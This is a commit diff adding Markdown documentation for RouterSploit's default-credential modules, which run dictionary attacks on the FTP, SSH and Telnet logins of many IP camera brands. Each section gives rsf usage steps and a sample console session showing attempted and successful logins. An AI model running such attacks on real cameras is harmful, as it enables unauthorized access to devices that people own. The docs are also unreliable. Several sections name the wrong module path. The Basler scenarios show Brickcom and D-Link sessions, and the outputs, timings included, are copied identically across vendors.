Unverified Commit ed19c564 by Marcin Bury Committed by GitHub

Adding basic docs for creds modules (#443)

parent d64359b8
......@@ -12,4 +12,4 @@ Provide steps to test or reproduce the PR.
- [ ] `run`
- [ ] ...
- [ ] Write tests ([Example](https://github.com/threat9/routersploit/blob/master/tests/exploits/routers/dlink/test_dsl_2750b_rce.py))
- [ ] Document how it works
- [ ] Document how it works ([Example](https://github.com/threat9/routersploit/blob/master/docs/modules/exploits/routers/dlink/dsl_2750b_rce.md))
## Description
Module performs dictionary attack with default credentials against Acti Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/acti/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/acti/ftp_default_creds
rsf (Acti Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Acti Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Acti Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/acti/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/acti/ssh_default_creds
rsf (Acti Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Acti Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Acti Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/acti/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/acti/telnet_default_creds
rsf (Acti Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Acti Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against American Dynamics Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/american_dynamics/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/american_dynamics/ftp_default_creds
rsf (American Dynamics Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (American Dynamics Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against American Dynamics Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/american_dynamics/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/american_dynamics/ssh_default_creds
rsf (American Dynamics Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (American Dynamics Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against American Dynamics Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/american_dynamics/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/american_dynamics/telnet_default_creds
rsf (American Dynamics Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (American Dynamics Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Arecont Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/arecont/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/arecont/ftp_default_creds
rsf (Arecont Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Arecont Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Arecont Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/arecont/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/arecont/ssh_default_creds
rsf (Arecont Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Arecont Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Arecont Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/arecont/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/arecont/telnet_default_creds
rsf (Arecont Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Arecont Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Avigilon Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/avigilon/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/avigilon/ftp_default_creds
rsf (Avigilon Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avigilon Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Avigilon Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/avigilon/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/avigilon/ssh_default_creds
rsf (Avigilon Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avigilon Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Avigilon Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/avigilon/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/avigilon/telnet_default_creds
rsf (Avigilon Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avigilon Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Avtech Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/avtech/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/avtech/ftp_default_creds
rsf (Avtech Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avtech Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Avtech Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/avtech/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/avtech/ssh_default_creds
rsf (Avtech Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avtech Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Avtech Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/avtech/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/avtech/telnet_default_creds
rsf (Avtech Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avtech Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Axis Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/axis/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/axis/ftp_default_creds
rsf (Axis Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Axis Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Axis Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/axis/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/axis/ssh_default_creds
rsf (Axis Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Axis Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Axis Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/axis/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/axis/telnet_default_creds
rsf (Axis Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Axis Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Basler Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/basler/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/basler/ftp_default_creds
rsf (Basler Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Basler Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Basler Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/basler/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/brickcom/ssh_default_creds
rsf (Brickcom Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Brickcom Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Basler Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/basler/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/dlink/telnet_default_creds
rsf (D-Link Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Brickcom Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/brickcom/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/brickcom/ftp_default_creds
rsf (Brickcom Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Brickcom Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Brickcom Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/brickcom/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/brickcom/ssh_default_creds
rsf (Brickcom Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Brickcom Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Brickcom Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/brickcom/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/brickcom/telnet_default_creds
rsf (Brickcom Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Brickcom Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Canon Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/canon/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/canon/ftp_default_creds
rsf (Canon Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Canon Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Canon Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/canon/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/canon/ssh_default_creds
rsf (Canon Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Canon Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Canon Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/canon/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/canon/telnet_default_creds
rsf (Canon Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Canon Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
